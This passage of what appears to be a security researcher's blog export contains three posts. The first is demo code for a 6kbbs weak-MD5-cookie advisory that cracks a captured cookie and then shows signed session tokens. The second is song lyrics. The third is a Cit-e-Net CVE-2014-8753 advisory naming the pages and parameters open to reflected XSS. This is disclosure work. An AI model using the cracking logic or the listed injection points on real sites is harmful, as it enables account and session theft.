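    record = hashlib.sha256(nonce.encode()).hexdigest()
    return cookie, record


def verify_session_token(cookie: str, stored_records: Set[str],
                         secret: bytes = SERVER_SECRET) -> Optional[int]:
    """Return the user id if the cookie is authentic and still active, else None."""
    try:
        user_id, nonce, tag = cookie.split(":")
    except ValueError:
        return None
    if not hmac.compare_digest(_tag(user_id, nonce, secret), tag):
        return None  # forged or tampered
    if hashlib.sha256(nonce.encode()).hexdigest() not in stored_records:
        return None  # logged out, expired or never issued
    return int(user_id)


def set_cookie_header(name: str, value: str) -> str:
    """Set-Cookie line with the attribute the 6kbbs cookie lacks (HttpOnly),
    plus Secure and SameSite to keep it off plaintext and cross-site requests."""
    return f"Set-Cookie: {name}={value}; Path=/; HttpOnly; Secure; SameSite=Lax"


if __name__ == "__main__":
    wordlist = ["123456", "password", "qwerty", "letmein", "iloveyou"]  # constructed
    captured = weak_cookie_token("password")  # what an XSS payload would read
    print("captured cookie :", captured)
    print("recovered pass  :", crack_md5_token(captured, wordlist))
    cookie, record = issue_session_token(42)
    print(set_cookie_header("session", cookie))
    print("verifies as user:", verify_session_token(cookie, {record}))
```

<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Two points the code makes that the prose does not: the HMAC check runs before any database access, so forged cookies cost the server nothing, and logging out is a matter of deleting the server-side record, which is impossible when the cookie is a function of the password alone.</span></div>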
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">"The MD5 message-digest cryptography algorithm is a widely used cryptographic hash function producing a 128-bit (16-byte) hash value, typically expressed in text format as a 32 digit hexadecimal number. Papers about it have been published at Eurocrypt, Asiacrypt and Crypto. Meanwhile, researchers focusing on it spread in Computer Science, Computer Engineering, IEEE and Mathematics. MD5 has been utilized in a wide variety of cryptographic applications, and is also commonly used to verify data integrity. MD5 was designed by Ronald Rivest in 1991 to replace an earlier hash function, MD4. The source code in RFC 1321 contains a "by attribution" RSA license." (Wikipedia)</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">References:</span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://seclists.org/fulldisclosure/2015/Jun/34"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">http://seclists.org/fulldisclosure/2015/Jun/34</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://lists.openwall.net/full-disclosure/2015/06/11/6"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">http://lists.openwall.net/full-disclosure/2015/06/11/6</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://static-173-79-223-25.washdc.fios.verizon.net/?l=full-disclosure&m=143405936018977&w=2"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">http://static-173-79-223-25.washdc.fios.verizon.net/?l=full-disclosure</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="https://www.mail-archive.com/fulldisclosure%40seclists.org/msg02160.html"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">https://www.mail-archive.com/fulldisclosure%40seclists.org/msg02160.html</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="https://packetstormsecurity.com/files/132270/6kbbs-7.1-8.0-Weak-Cryptography.html"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">https://packetstormsecurity.com/files/132270/6kbbs-7.1-8.0-Weak-Cryptography.html</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://permalink.gmane.org/gmane.comp.security.fulldisclosure/2092"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">http://permalink.gmane.org/gmane.comp.security.fulldisclosure/2092</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://tetraph.blog.163.com/blog/static/234603051201551415853846/#"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">http://tetraph.blog.163.com/blog/static/234603051201551415853846/#</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://essaybeans.blogspot.com/2015/06/6kbbs-v80-weak-encryption-cryptography.html"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">http://essaybeans.blogspot.com/2015/06/6kbbs-v80-weak-encryption-cryptography.html</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="https://mathfas.wordpress.com/2015/06/14/6kbbs-weak-encryption/"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">https://mathfas.wordpress.com/2015/06/14/6kbbs-weak-encryption/</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://tetraph.com/security/weak-encryption/6kbbs-v8-0-weak-encryption/"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">http://tetraph.com/security/weak-encryption/6kbbs-v8-0-weak-encryption/</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://securityrelated.blogspot.com/2015/06/6kbbs-v80-weak-encryption-cryptography.html"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">http://securityrelated.blogspot.com/2015/06/6kbbs-v80-weak-encryption-cryptography.html</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="https://vulnerabilitypost.wordpress.com/2015/06/11/6kbbs-v8-0-weak-encryption/"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">https://vulnerabilitypost.wordpress.com/2015/06/11/6kbbs-v8-0-weak-encryption/</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://www.inzeed.com/kaleidoscope/computer-security/6kbbs-v8-0-weak-encryption/"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">http://www.inzeed.com/kaleidoscope/computer-security/6kbbs-v8-0-weak-encryption/</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-6322800700334987667.post-47132457380961802782015-06-07T01:40:00.002-07:002015-06-07T02:08:51.817-07:00熱帶雨林 (Tropical Rainforest) - S.H.E - 青春株式會社 (Youth Co., Ltd.), a soft and gentle Chinese-language song<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEishnCXvf1CNdT_WgtPpV-YDLRokOu1-An5LBySBuGhWpqtjgPteKulOpXeL1p5tcoicwtkmRsgn5FC0fNkOPEhijqkGQE48asWc6Wi1wcrp8lDaJaUYym93nWW-gEg8MG9Hlxn36dKCgL2/s1600/48.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="275" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEishnCXvf1CNdT_WgtPpV-YDLRokOu1-An5LBySBuGhWpqtjgPteKulOpXeL1p5tcoicwtkmRsgn5FC0fNkOPEhijqkGQE48asWc6Wi1wcrp8lDaJaUYym93nWW-gEg8MG9Hlxn36dKCgL2/s400/48.jpg" width="400" /></a></div>
<br />
<br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;">In high school I first heard this song from a classmate and loved it immensely. Now, many years later, the scenery is the same but the people have changed; I made a video to console myself and to remember the youth that has passed. "熱帶雨林" (Tropical Rainforest) uses a soft, gentle melody that easily brings back old memories, and sad yet moving lyrics that readily strike a chord with listeners. Through the perfect interplay of the three singers, the song conveys the feeling of adolescent boys and girls trapped in love, as if caught in a dream, lost in a tropical rainforest.</span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;">Music<br />Album: "青春株式會社" (Youth Co., Ltd.)<br />Original artists: S.H.E - 任家萱 (Selina), 田馥甄 (Hebe), 陳嘉樺 (Ella)<br />Lyrics: 方文山 (Vincent Fang)<br />Composer: 周傑倫 (Jay Chou)</span></span><br />
<br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;">Lyrics<br />A cold wind passes through, memories freeze into ice<br />All that I gave gets no reply<br />Regret is like an endless range of hills<br />Pain descends from every direction<br />Sorrow invades<br />Vows go missing; I cannot find the times we once loved<br />You are like a vulture circling above the loneliness<br />Gnawing my longing for you clean away<br />Moonlight sways the shadows of the trees, weaving through the tropical rainforest<br />The reason you left, you never explain<br />Your lies were like a trap; only at the end did I wake up<br />Happiness was only a reflection in the water<br />Moonlight sways the shadows of the trees, weaving through the tropical rainforest<br />The rain of sorrow never stops; I am drenched in blood<br />My wretched love, sunk deep in the swamp<br />Is a heartbreak I am powerless against<br />Sorrow invades, vows go missing<br />I cannot find the times we once loved<br />You are like a vulture circling above the loneliness<br />Gnawing my longing for you clean away<br />Moonlight sways the shadows of the trees, weaving through the tropical rainforest<br />The reason you left, you never explain<br />Your lies were like a trap; only at the end did I wake up<br />Happiness was only a reflection in the water<br />Moonlight sways the shadows of the trees, weaving through the tropical rainforest<br />The rain of sorrow never stops; I am drenched in blood<br />My wretched love, sunk deep in the swamp<br />Is a heartbreak I am powerless against</span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;">Produced by: 谷雨 (Essayjeans) <a href="https://twitter.com/justqdjing/status/586520579353640960">@justqdjing</a><br />Image: from the internet<br /><a href="http://www.tetraph.com/blog/essayjeans/">http://www.tetraph.com/blog/essayjeans/</a><br /><br /></span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /><br />Video: <a href="https://www.youtube.com/watch?v=VNi6oIf_u3Y">https://www.youtube.com/watch?v=VNi6oIf_u3Y</a><br />Lyrics: <a href="http://essayjeans.blog.163.com/blog/static/23717307420155744626301/">http://essayjeans.blog.163.com/blog/static/23717307420155744626301/</a><br />Twitter: <a href="https://twitter.com/essayjeans/status/607468881662214144">https://twitter.com/essayjeans/status/607468881662214144</a><br />Lofter: <a href="http://aibiyi.lofter.com/post/1cc9f4e9_735dd83">http://aibiyi.lofter.com/post/1cc9f4e9_735dd83</a><br />Tumblr: <a href="http://canghaixiao.tumblr.com/post/120922254507">http://canghaixiao.tumblr.com/post/120922254507</a><br />Google+: <a href="https://plus.google.com/u/0/+essayjeans/posts/HrzASc1VcG6">https://plus.google.com/u/0/+essayjeans/posts/HrzASc1VcG6</a><br />Facebook: <a href="https://www.facebook.com/essayjeans/posts/840142132743607">https://www.facebook.com/essayjeans/posts/840142132743607</a></span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-6322800700334987667.post-65966077213115753232015-06-06T20:40:00.000-07:002015-06-06T20:40:41.730-07:00CVE-2014-8753 Cit-e-Net Multiple XSS (Cross-Site Scripting) Web Security Vulnerabilities<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div>
<div class="separator" style="clear: both; margin: 0px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiU6QyW3BV_ft4J5q3bVtcy-tZ_QQhTEtHfIrXCdEFOakAmcNJnnkl6WOpX-AQI14lNtMbn-cUXfPO-4styx4701rrHWtxKCwoOx3DdxJlLfzynuyo8U_QZ0r9yjcE-PoR9ShQyRxUKpc0/s1600/cit_e_net.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><span style="color: black; font-family: Arial, Helvetica, sans-serif;"><img border="0" height="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiU6QyW3BV_ft4J5q3bVtcy-tZ_QQhTEtHfIrXCdEFOakAmcNJnnkl6WOpX-AQI14lNtMbn-cUXfPO-4styx4701rrHWtxKCwoOx3DdxJlLfzynuyo8U_QZ0r9yjcE-PoR9ShQyRxUKpc0/s400/cit_e_net.png" style="cursor: move;" width="400" /></span></a></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><strong>CVE-2014-8753 Cit-e-Net Multiple XSS (Cross-Site Scripting) Web Security Vulnerabilities</strong></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><strong><br /></strong><strong><br /></strong></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Exploit Title: Cit-e-Net Multiple XSS (Cross-Site Scripting) Web Security Vulnerabilities</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Product: Cit-e-Access</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Vendor: Cit-e-Net</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Vulnerable Versions: Version 6</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Tested Version: Version 6</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Advisory Publication: February 12, 2015</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Latest Update: June 01, 2015</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Vulnerability Type: Cross-Site Scripting [CWE-79]</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">CVE Reference: CVE-2014-8753</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Impact CVSS Severity (version 2.0):</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N)</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Impact Subscore: 2.9</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Exploitability Subscore: 8.6</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">CVSS Version 2 Metrics:</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Access Vector: Network exploitable; Victim must voluntarily interact with attack mechanism</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Access Complexity: Medium</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Authentication: Not required to exploit</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Impact Type: Allows unauthorized modification</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Discoverer and Author: <span style="font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; line-height: 19.6000003814697px; text-align: justify;">Jing Wang [School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore] (</span><a href="https://twitter.com/justqdjing/status/565810093564772352">@justqdjing</a><span style="font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; line-height: 19.6000003814697px; text-align: justify;">)</span></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<strong><span style="font-family: Arial, Helvetica, sans-serif;">Instruction Details:</span></strong></div>
</div>
<div>
<div style="margin: 0px;">
<strong><span style="font-family: Arial, Helvetica, sans-serif;">(1) Vendor & Product Description:</span></strong></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><strong><br /></strong><strong><br /></strong><strong><br /></strong></span></div>
</div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vendor:</span></b></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Cit-e-Net</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<strong><span style="font-family: Arial, Helvetica, sans-serif;">Product & Version: </span></strong></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Cit-e-Access</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Version 6</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<strong><span style="font-family: Arial, Helvetica, sans-serif;">Vendor URL & Download: </span></strong></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Product documentation, a public demo site and the vendor's demo-request form are available here:</span></div>
</div>
<div>
<div style="margin: 0px;">
<a data-mce-href="https://www.cit-e.net/citeadmin/help/cntrainingmanualhowto.pdf" href="https://www.cit-e.net/citeadmin/help/cntrainingmanualhowto.pdf" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.cit-e.net/<wbr></wbr>citeadmin/help/<wbr></wbr>cntrainingmanualhowto.pdf</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<a data-mce-href="http://demo.cit-e.net/" href="http://demo.cit-e.net/" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://demo.cit-e.net/</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<a data-mce-href="http://www.cit-e.net/demorequest.cfm" href="http://www.cit-e.net/demorequest.cfm" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.cit-e.net/<wbr></wbr>demorequest.cfm</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a data-mce-href="http://demo.cit-e.net/Cit-e-Access/ServReq/?TID=1&TPID=17" href="http://demo.cit-e.net/Cit-e-Access/ServReq/?TID=1&TPID=17" target="_blank">http://demo.cit-e.net/Cit-e-<wbr></wbr>Access/ServReq/?TID=1&TPID=17</a></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<strong><span style="font-family: Arial, Helvetica, sans-serif;">Product Introduction:</span></strong></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">"We are a premier provider of Internet-based solutions encompassing web site development and modular interactive e-government applications which bring local government, residents and community businesses together.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Cit-e-Net provides a suite of on-line interactive services to counties, municipalities, and other government agencies, that they in turn can offer to their constituents. The municipal government achieves a greater degree of efficiency and timeliness in conducting the daily operations of government, while residents receive improved and easier access to city hall through the on-line access to government services.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br />Our web-based applications can help your municipality to achieve its e-government goals. Type & click website content-management empowers the municipality to manage the website quickly and easily. Web page styles & formats are customizable by the municipality, and because the foundation is a database application, user security can be set for individual personnel and module applications. Our application modules can either be integrated into your existing municipal web site or implemented as a complete web site solution. It's your choice! Please contact us at info@cit-e.net to view a demonstration of our municipal web site solution if you are an elected official or member of municipal management and your municipality is looking for a cost efficient method for enhancing & improving municipal services. </span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br />Interactive Applications</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Online Service Requests</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Online Tax Payments by ACH electronic-check or credit card.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Online Utility Payments by ACH electronic-check or credit card.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Online General-Payments by ACH electronic-check or credit card.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Submit Volunteer Resumes Online for the municipality to match your skills with available openings."</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /><br /><br /><br /><br /><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<strong><span style="font-family: Arial, Helvetica, sans-serif;">(2) Vulnerability Details:</span></strong></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">The Cit-e-Access <span style="background-color: white;">web application is vulnerable to cross-site scripting (XSS). A remote attacker can craft a request that, when followed by a victim, executes arbitrary script code in that user's browser session, within the trust relationship between the browser and the server.</span></span></div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Other researchers have previously reported zero-day vulnerabilities in similar products, and Cit-e-Access has patched some of them. The Open Sourced Vulnerability Database (OSVDB) is an independent, open database whose goal is to provide accurate, detailed, current and unbiased technical information on security vulnerabilities and to promote open collaboration between companies and individuals; it has published advisories, suggestions and solution details for important vulnerabilities and cyber intelligence.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><strong>(2.1)</strong><span class="Apple-converted-space"> </span>The first flaw is in the "/eventscalendar/index.cfm" page: the "DID" parameter of an HTTP GET request is reflected into the response without adequate output encoding.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><strong>(2.2)</strong><span class="Apple-converted-space"> </span>The second flaw is in the "/search/index.cfm" page: the "keyword" parameter of an HTTP POST request is reflected into the response without adequate output encoding.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><strong>(2.3)</strong><span class="Apple-converted-space"> </span>The third flaw is in the "/news/index.cfm" page: the "jump2" and "DID" parameters of an HTTP GET request are reflected into the response without adequate output encoding.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><strong>(2.4)</strong><span class="Apple-converted-space"> </span>The fourth flaw is in the "eventscalendar" page: the "TPID" parameter of an HTTP GET request is reflected into the response without adequate output encoding.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><strong>(2.5)</strong><span class="Apple-converted-space"> </span>The fifth flaw is in the "/meetings/index.cfm" page: the "DID" parameter of an HTTP GET request is reflected into the response without adequate output encoding.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /><br /></span></div>
</div>
